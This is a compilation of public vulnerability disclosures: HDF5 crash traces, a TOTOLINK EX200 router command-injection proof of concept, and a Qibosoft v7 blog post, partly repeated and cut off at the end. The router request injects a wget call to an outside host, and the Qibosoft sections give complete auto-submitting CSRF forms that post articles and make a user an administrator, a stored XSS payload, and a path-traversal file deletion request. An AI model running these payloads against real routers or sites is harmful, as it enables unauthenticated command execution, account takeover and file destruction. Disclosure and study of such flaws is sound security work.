A heap-based buffer overflow vulnerability exists in HDF5 1.13.1-1 via H5F_addr_decode_len in /hdf5/src/H5Fint.c, which could cause a Denial of Service.

    Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)
    

    ==3895624==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000053a0 at pc 0x55f43fe64fa1 bp 0x7fff5fa6dc60 sp 0x7fff5fa6dc50
    READ of size 1 at 0x6060000053a0 thread T0
        #0 0x55f43fe64fa0 in H5F_addr_decode_len /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:2855
        #1 0x55f43ffd5f01 in H5O__fsinfo_decode /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Ofsinfo.c:186
        #2 0x55f43ffefb74 in H5O_msg_read_oh /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Omessage.c:514
        #3 0x55f43fff033b in H5O_msg_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Omessage.c:455
        #4 0x55f43fe7e8d7 in H5F__super_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fsuper.c:782
        #5 0x55f43fe6b6d1 in H5F_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:1963
        #6 0x55f44029730b in H5VL__native_file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLnative_file.c:127
        #7 0x55f44026b72b in H5VL__file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:3497
        #8 0x55f44026b72b in H5VL_file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:3646
        #9 0x55f43fe46570 in H5F__open_api_common /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5F.c:795
        #10 0x55f43fe4a7eb in H5Fopen /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5F.c:836
        #11 0x55f43fce521b in h5tools_fopen /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools.c:932
        #12 0x55f43fcdcafa in main /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5format_convert/h5format_convert.c:409
        #13 0x7f67d18450b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #14 0x55f43fce03ed in _start (/home/zxq/CVE_testing/source/hdf5-add/hdf5/build/bin/h5format_convert+0x16e3ed)
    
    0x6060000053a0 is located 0 bytes to the right of 64-byte region [0x606000005360,0x6060000053a0)
    allocated by thread T0 here:
        #0 0x7f67d1c72bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x55f43febb1fe in H5FL__malloc /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5FL.c:238
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:2855 in H5F_addr_decode_len
    Shadow bytes around the buggy address:
      0x0c0c7fff8a20: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
      0x0c0c7fff8a30: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
      0x0c0c7fff8a40: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c0c7fff8a50: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
      0x0c0c7fff8a60: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
    =>0x0c0c7fff8a70: 00 00 00 00[fa]fa fa fa 00 00 00 00 00 00 00 fa
      0x0c0c7fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0c7fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0c7fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0c7fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0c7fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc

CVE-2021-45830: heap-buffer-overflow atH5F_addr_decode_len /hdf5/src/H5Fint.c:2855 · Issue #1314 · HDFGroup/hdf5

The downloadFlile.cgi binary file in TOTOLINK EX200 V4.0.3c.7646_B20201211 has a command injection vulnerability when receiving GET parameters. The parameter name can be constructed for unauthenticated command execution.

Permalink

Cannot retrieve contributors at this time

**ToTolink EX200 Comand Injection****Venda && Firmware\_link**

ToTolink EX200 http://totolink.net/home/menu/detail/menu\_listtpl/download/id/144/ids/36.html

link :http://totolink.net/data/upload/20210428/7979e841521515eb83b45aacf5b67f9a.zip

Firmware\_link :V4.0.3c.7646\_B20201211

**Describe**

​ The downloadFlile.cgi binary file has a command injection vulnerability when receiving GET parameters. The parameter name can be constructed for unauthenticated command execution

![image-20211020110137084](https://github.com/doudoudedi/ToTolink_EX200_Cmmand_Execute/raw/main/img/image-20211020110137084.png)

​ In the downloadFile cgi program, the QUERY\_STRING environment parameter variable is the content of the GET request, so the parameter name can be controlled for command injection

**POC**

    GET /cgi-bin/downloadFlile.cgi?;wget${IFS}http://192.168.0.111:801/mm.txt;=hahah HTTP/1.1
    
    Host: 192.168.0.254
    
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
    
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    
    Accept-Language: en-US,en;q=0.5
    
    Accept-Encoding: gzip, deflate
    
    Connection: close
    
    Upgrade-Insecure-Requests: 1
    

**TEXT**

​ Listen to port 801 locally, and the browser accesses the following URL

![image-20211020114318773](https://github.com/doudoudedi/ToTolink_EX200_Cmmand_Execute/raw/main/img/image-20211020114318773.png)

​ can see that the wireless extender has successfully connected to the local port 801

![image-20211020114301709](https://github.com/doudoudedi/ToTolink_EX200_Cmmand_Execute/raw/main/img/image-20211020114301709.png)

**Reporting process****2021.10.20 found this vuln****2021.10.22 apply for vender****2021.11.03 fix vuln**

The manufacturer's email indicates that the vulnerability has been fixed, but maybe can't issue an announcement

**2021.11.11 public this vuln****CNVD-2021-85251**

https://www.cnvd.org.cn/flaw/show/CNVD-2021-85251

CVE-2021-43711: ToTolink_EX200_Cmmand_Execute/ToTolink EX200 Comand Injection2.md at main · doudoudedi/ToTolink_EX200_Cmmand_Execute

HDF5 1.13.1-1 is affected by: segmentation fault, which causes a Denial of Service.

**Version:**

**System information**

    Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)
    

**command:**

POC8.zip

**result**

**ASAN information**

    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    __GI___libc_free (mem=0x61626c6c6163206c) at malloc.c:3102
    3102  malloc.c: No such file or directory.
    gdb-peda$ bt
    #0  __GI___libc_free (mem=0x61626c6c6163206c) at malloc.c:3102
    #1  0x000055555566ff52 in H5MM_xfree (mem=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5MM.c:557
    #2  0x0000555555693fb1 in H5O__link_reset (_mesg=0x55555594d4b0) at /home/zxq/CVE_testing/source/hdf5/src/H5Olink.c:564
    #3  0x0000555555695d8d in H5O__msg_reset_real (type=<optimized out>, type=<optimized out>, native=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:589
    #4  H5O_msg_reset (type_id=type_id@entry=0x6, native=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:556
    #5  0x0000555555631d78 in H5G__link_release_table (ltable=ltable@entry=0x7fffffffd990) at /home/zxq/CVE_testing/source/hdf5/src/H5Glink.c:517
    #6  0x0000555555802355 in H5G__compact_iterate (oloc=oloc@entry=0x55555594d3d8, linfo=<optimized out>, idx_type=idx_type@entry=H5_INDEX_NAME, 
        order=order@entry=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=0x55555562f110 <H5G__visit_cb>, op_data=0x7fffffffdb30)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gcompact.c:412
    #7  0x000055555563887f in H5G__obj_iterate (grp_oloc=grp_oloc@entry=0x55555594d3d8, idx_type=H5_INDEX_NAME, order=order@entry=H5_ITER_INC, 
        skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=op@entry=0x55555562f110 <H5G__visit_cb>, op_data=0x7fffffffdb30)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gobj.c:661
    #8  0x0000555555630b64 in H5G_visit (loc=loc@entry=0x7fffffffdbc0, group_name=<optimized out>, idx_type=<optimized out>, order=H5_ITER_INC, 
        op=<optimized out>, op_data=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5Gint.c:1243
    #9  0x00005555557ae1f5 in H5VL__native_link_specific (obj=<optimized out>, loc_params=0x7fffffffdc40, args=0x7fffffffdc70, dxpl_id=<optimized out>, 
        req=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLnative_link.c:374
    #10 0x000055555579d200 in H5VL__link_specific (cls=<optimized out>, req=0x0, dxpl_id=0xb00000000000008, args=0x7fffffffdc70, loc_params=0x7fffffffdc40, 
        obj=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5305
    #11 H5VL_link_specific (vol_obj=vol_obj@entry=0x55555594b890, loc_params=loc_params@entry=0x7fffffffdc40, args=args@entry=0x7fffffffdc70, 
        dxpl_id=0xb00000000000008, req=req@entry=0x0) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5339
    #12 0x0000555555664b41 in H5Lvisit_by_name2 (loc_id=loc_id@entry=0x100000000000000, group_name=group_name@entry=0x5555558166e4 "/", 
        idx_type=H5_INDEX_NAME, order=H5_ITER_INC, op=op@entry=0x55555557eda0 <traverse_cb>, op_data=op_data@entry=0x7fffffffdd40, lapl_id=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5L.c:1984
    #13 0x000055555558040e in traverse (fields=0x1f, visitor=0x7fffffffdd00, recurse=0x1, visit_start=<optimized out>, grp_name=0x5555558166e4 "/", 
        file_id=0x100000000000000) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:288
    #14 h5trav_visit (fid=0x100000000000000, grp_name=0x5555558166e4 "/", visit_start=<optimized out>, recurse=<optimized out>, visit_obj=<optimized out>, 
        visit_lnk=<optimized out>, udata=0x7fffffffde80, fields=0x1f) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:1057
    #15 0x0000555555563727 in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe308) at /home/zxq/CVE_testing/source/hdf5/tools/src/h5stat/h5stat.c:1795
    #16 0x00007ffff7c930b3 in __libc_start_main (main=0x555555562f20 <main>, argc=0x2, argv=0x7fffffffe308, init=<optimized out>, fini=<optimized out>, 
        rtld_fini=<optimized out>, stack_end=0x7fffffffe2f8) at ../csu/libc-start.c:308
    #17 0x0000555555563a3e in _start ()

CVE-2021-45829: segmentation fault in h5stat · Issue #1317 · HDFGroup/hdf5

An issue in /admin/index.php?lfj=mysql&action=del of Qibosoft v7 allows attackers to arbitrarily delete files.

**Foreword**

The csrf vulnerabilities exists almost everywhere in the application. Due to a number of background vulnerabilities, just with a few tricks, an attacker can take over the application. Next, I’ll show you a few problems caused by CSRF combined with other background vulnerabilities.  
if you want to reproduce these vuls , please go to qisoft and download “齐博CMS整站系统v7”

**0x01 CSRF in publishing articles**

position: /member/post.php?job=postnew&step=post

a normal http request like this:

    POST /qibo7/member/post.php?job=postnew&step=post HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1005
    Connection: close
    Referer: http://localhost:8123/qibo7/member/post.php?job=postnew&only=1&mid=0
    Cookie: USR=faol4ey2%091%091571797336%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fupfile.php%3Ffn%3Duppic%26dir%3Darticle%2F%26ISone%3D1; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201571799136084%7D; __51cke__=; __51laig__=42; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774
    Upgrade-Insecure-Requests: 1
    
    fid=4&postdb%5Btitle%5D=ceshi2&postdb%5Btitlecolor%5D=ceshi&postdb%5Bfonttype%5D=1&postdb%5Bforbidcomment%5D=1&postdb%5Bkeywords%5D=ceshi&select2=&postdb%5Bauthor%5D=&postdb%5Bcopyfrom%5D=&select=&postdb%5Bcopyfromurl%5D=&postdb%5Bpicurl%5D=&postdb%5Bautomakesmall%5D=1&picWidth=300&picHeight=225&postdb%5Bdescription%5D=&postdb%5Byz%5D=1&PageNum=3000&postdb%5Bcontent%5D=1233333323%3Cbr+%2F%3E%0D%0A&Submit=+%E6%8F%90+%E4%BA%A4+&postdb%5Bbak_id%5D=&mid=0&i_id=&aid=0&rid=&only=1&postdb%5Bsmalltitle%5D=&postdb%5Bhtmlname%5D=&postdb%5Btpl%5D%5Bhead%5D=&postdb%5Btpl%5D%5Bfoot%5D=&postdb%5Btpl%5D%5Bbencandy%5D=&postdb%5Bstyle%5D=&postdb%5Bposttime%5D=&postdb%5Bbegintime%5D=&postdb%5Bendtime%5D=&postdb%5Bhits%5D=&postdb%5Bpasswd%5D=&postdb%5Bmoney%5D=&postdb%5Bsubhead%5D=&vote_db%5Bname%5D=&vote_db%5Btype%5D=1&vote_db%5Blimittime%5D=&vote_db%5Blimitip%5D=0&vote_db%5Bforbidguestvote%5D=0&vote_db%5Bbegintime%5D=&vote_db%5Bendtime%5D=&vote_db%5Babout%5D=&vote_db%5Bvotetype%5D=0&textfield=1&hiddenField=0
    

from the request, we can find that there is not a csrf token, besides, the app does not check the referer.Then, we can generate a csrf poc like the one below by burpsuite:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form id="csrf" action="http://localhost:8123/qibo7/member/post.php?job=postnew&step=post" method="POST">
          <input type="hidden" name="fid" value="4" />
          <input type="hidden" name="postdb&#91;title&#93;" value="you have been hacked" />
          <input type="hidden" name="postdb&#91;titlecolor&#93;" value="ceshi" />
          <input type="hidden" name="postdb&#91;fonttype&#93;" value="1" />
          <input type="hidden" name="postdb&#91;forbidcomment&#93;" value="1" />
          <input type="hidden" name="postdb&#91;keywords&#93;" value="ceshi" />
          <input type="hidden" name="select2" value="" />
          <input type="hidden" name="postdb&#91;author&#93;" value="" />
          <input type="hidden" name="postdb&#91;copyfrom&#93;" value="" />
          <input type="hidden" name="select" value="" />
          <input type="hidden" name="postdb&#91;copyfromurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;picurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;automakesmall&#93;" value="1" />
          <input type="hidden" name="picWidth" value="300" />
          <input type="hidden" name="picHeight" value="225" />
          <input type="hidden" name="postdb&#91;description&#93;" value="" />
          <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
          <input type="hidden" name="PageNum" value="3000" />
          <input type="hidden" name="postdb&#91;content&#93;" value="1233333323&lt;br&#32;&#47;&gt;&#13;&#10;" />
          <input type="hidden" name="Submit" value="&#32;æ&#143;&#144;&#32;äº&#164;&#32;" />
          <input type="hidden" name="postdb&#91;bak&#95;id&#93;" value="" />
          <input type="hidden" name="mid" value="0" />
          <input type="hidden" name="i&#95;id" value="" />
          <input type="hidden" name="aid" value="0" />
          <input type="hidden" name="rid" value="" />
          <input type="hidden" name="only" value="1" />
          <input type="hidden" name="postdb&#91;smalltitle&#93;" value="" />
          <input type="hidden" name="postdb&#91;htmlname&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;head&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;foot&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;bencandy&#93;" value="" />
          <input type="hidden" name="postdb&#91;style&#93;" value="" />
          <input type="hidden" name="postdb&#91;posttime&#93;" value="" />
          <input type="hidden" name="postdb&#91;begintime&#93;" value="" />
          <input type="hidden" name="postdb&#91;endtime&#93;" value="" />
          <input type="hidden" name="postdb&#91;hits&#93;" value="" />
          <input type="hidden" name="postdb&#91;passwd&#93;" value="" />
          <input type="hidden" name="postdb&#91;money&#93;" value="" />
          <input type="hidden" name="postdb&#91;subhead&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;name&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;type&#93;" value="1" />
          <input type="hidden" name="vote&#95;db&#91;limittime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;limitip&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;forbidguestvote&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;begintime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;endtime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;about&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;votetype&#93;" value="0" />
          <input type="hidden" name="textfield" value="1" />
          <input type="hidden" name="hiddenField" value="0" />
        </form>
        <script>
            var poc = document.getElementById("csrf");
            poc.submit()
        </script>
      </body>
    </html>
    
    

attacker just need to save the poc as a html and put it on his web server, then send the evil url to another users ,If the user clicks the evil url when logged into the system, he will publish an article(and the article title is defind in the poc) without his knowledge.Now, I will show you the details. I login admin account locally:

and I try to request the evil url(http://localhost/test/csrf\_poc1.php), then when we back to the index.php we will find that one more article is published with title “you have been hacked”!

**0x02 CSRF to Privilege Escalation (add an super administrator)**

position: /admin/index.php?lfj=member&action=editmember

normal request(change user “axin” to administrator):

    POST /qibo7/admin/index.php?lfj=member&action=editmember HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 633
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=member&job=editmember&uid=2
    Cookie: USR=faol4ey2%096%091571798905%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fregfield.php%3Fjob%3Dreg%26uid%3D2%260.20012388446694007; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Busername%5D=axin&postdb%5Bpassword%5D=5f4dcc3b5aa765d61d8327deb882cf99&postdb%5Bnewpassword%5D=&postdb%5Bgroupid%5D=3&ConfigDB%5Bendtime%5D=&postdb%5Bemail%5D=770284144%40qq.com&postdb%5Bicon%5D=&picWidth=150&picHeight=150&postdb%5Bmoney%5D=5&postdb%5Btotalspace%5D=0&postdb%5Boltime%5D=13226&postdb%5Bsex%5D=0&postdb%5Byz%5D=1&postdb%5Bintroduce%5D=&postdb%5Boicq%5D=&postdb%5Bmsn%5D=&postdb%5Bhomepage%5D=&postdb%5Baddress%5D=&postdb%5Bpostalcode%5D=&postdb%5Btelephone%5D=&postdb%5Bmobphone%5D=&postdb%5Bidcard%5D=&postdb%5Btruename%5D=&email_yz=0&mob_yz=0&idcard_yz=0&Submit=%E4%BF%AE+%E6%94%B9&uid=2&postdb%5Bhits%5D2=2
    

then, we can generate a csrf poc by burpsuite:

    <html>
    
    <body>
    <script>history.pushState('', '', '/')</script>
    <form id="csrf" action="http://localhost:8123/qibo7/admin/index.php?lfj=member&action=editmember" method="POST">
        <input type="hidden" name="postdb&#91;username&#93;" value="axin" />
        <input type="hidden" name="postdb&#91;password&#93;" value="5f4dcc3b5aa765d61d8327deb882cf99" />
        <input type="hidden" name="postdb&#91;newpassword&#93;" value="" />
        <input type="hidden" name="postdb&#91;groupid&#93;" value="3" />
        <input type="hidden" name="ConfigDB&#91;endtime&#93;" value="" />
        <input type="hidden" name="postdb&#91;email&#93;" value="770284144&#64;qq&#46;com" />
        <input type="hidden" name="postdb&#91;icon&#93;" value="" />
        <input type="hidden" name="picWidth" value="150" />
        <input type="hidden" name="picHeight" value="150" />
        <input type="hidden" name="postdb&#91;money&#93;" value="5" />
        <input type="hidden" name="postdb&#91;totalspace&#93;" value="0" />
        <input type="hidden" name="postdb&#91;oltime&#93;" value="13226" />
        <input type="hidden" name="postdb&#91;sex&#93;" value="0" />
        <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
        <input type="hidden" name="postdb&#91;introduce&#93;" value="" />
        <input type="hidden" name="postdb&#91;oicq&#93;" value="" />
        <input type="hidden" name="postdb&#91;msn&#93;" value="" />
        <input type="hidden" name="postdb&#91;homepage&#93;" value="" />
        <input type="hidden" name="postdb&#91;address&#93;" value="" />
        <input type="hidden" name="postdb&#91;postalcode&#93;" value="" />
        <input type="hidden" name="postdb&#91;telephone&#93;" value="" />
        <input type="hidden" name="postdb&#91;mobphone&#93;" value="" />
        <input type="hidden" name="postdb&#91;idcard&#93;" value="" />
        <input type="hidden" name="postdb&#91;truename&#93;" value="" />
        <input type="hidden" name="email&#95;yz" value="0" />
        <input type="hidden" name="mob&#95;yz" value="0" />
        <input type="hidden" name="idcard&#95;yz" value="0" />
        <input type="hidden" name="Submit" value="ä&#191;&#174;&#32;æ&#148;&#185;" />
        <input type="hidden" name="uid" value="2" />
        <input type="hidden" name="postdb&#91;hits&#93;2" value="2" />
        <input type="submit" value="Submit request" />
    </form>
    <script>
        var poc = document.getElementById("csrf");
        poc.submit()
    </script>
    </body>
    </html>
    

the poc is to change user “axin” to administrator, if you want to reproduce the attack, you should register a common user first, and then generate csrf poc yourself.

from the picture below , we can see that the user axin is just a common user.  

but after the admin click the evil url, the user axin will be admin !!

**0x03 Stored XSS in background**

position:/admin/index.php?lfj=friendlink&action=add  
request:

    POST /qibo7/admin/index.php?lfj=friendlink&action=add HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 283
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=friendlink&job=add
    Cookie: USR=faol4ey2%091%091571805064%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dfriendlink%26job%3Dadd; __tins__20133593=%7B%22sid%22%3A%201571802713278%2C%20%22vd%22%3A%204%2C%20%22expires%22%3A%201571805446751%7D; __51cke__=; __51laig__=47; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Bname%5D=axin&postdb%5Bfid%5D=2&postdb%5Burl%5D=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&postdb%5Blogo%5D=&postdb%5Bdescrip%5D=&postdb%5Bifhide%5D=0&postdb%5Byz%5D=1&postdb%5Biswordlink%5D=0&postdb%5Bendtime%5D=&Submit=%E6%8F%90%E4%BA%A4%E6%95%B0%E6%8D%AE&id=
    

No dangerous characters are escaped， so we can insert our payload like below:  
"><script>alert(1);</script>  

  
  
of course, we can also combine the xss with the csrf to do more !

**0x04 Arbitrary File Deletion in background**

position:/admin/index.php?lfj=mysql&action=del

poc:

    POST /qibo7/admin/index.php?lfj=mysql&action=del HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 63
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=mysql&job=del
    Cookie: USR=faol4ey2%091%091571799626%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dmysql%26job%3Ddel; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=2%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=V29XS10LbVNSA1EBBgNVBwBXUQQNXQEBVF4GBVNcUlZdXgRQUlxd14a26ee802
    Upgrade-Insecure-Requests: 1
    
    baktime=../test.php&Submit=%E5%88%A0%E9%99%A4%E6%95%B0%E6%8D%AE
    

The problem occurred when the backup database was deleted， we can control the parameter “baktime”, and we can use ../ to achieve directory traversal purpose, so we can delete some web pages.I will show you details next.

firstly, create a file named axin.php in the root path of the application like below

and then send our payload

now, the file axin.php created just now has been deleted!

of course, we can also combine the vul with csrf to do more !

CVE-2020-20944: some vulnerabilities in qibosoft(齐博CMS整站系统v7)_tnt阿信的博客-CSDN博客

Qibosoft v7 contains a stored cross-site scripting (XSS) vulnerability in the component /admin/index.php?lfj=friendlink&action=add.

![](https://img-blog.csdnimg.cn/20200708203502702.gif#pic_center)

**Foreword**

The csrf vulnerabilities exists almost everywhere in the application. Due to a number of background vulnerabilities, just with a few tricks, an attacker can take over the application. Next, I’ll show you a few problems caused by CSRF combined with other background vulnerabilities.  
if you want to reproduce these vuls , please go to qisoft and download “齐博CMS整站系统v7”

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023130316593.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

**0x01 CSRF in publishing articles**

position: /member/post.php?job=postnew&step=post

a normal http request like this:

    POST /qibo7/member/post.php?job=postnew&step=post HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1005
    Connection: close
    Referer: http://localhost:8123/qibo7/member/post.php?job=postnew&only=1&mid=0
    Cookie: USR=faol4ey2%091%091571797336%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fupfile.php%3Ffn%3Duppic%26dir%3Darticle%2F%26ISone%3D1; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201571799136084%7D; __51cke__=; __51laig__=42; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774
    Upgrade-Insecure-Requests: 1
    
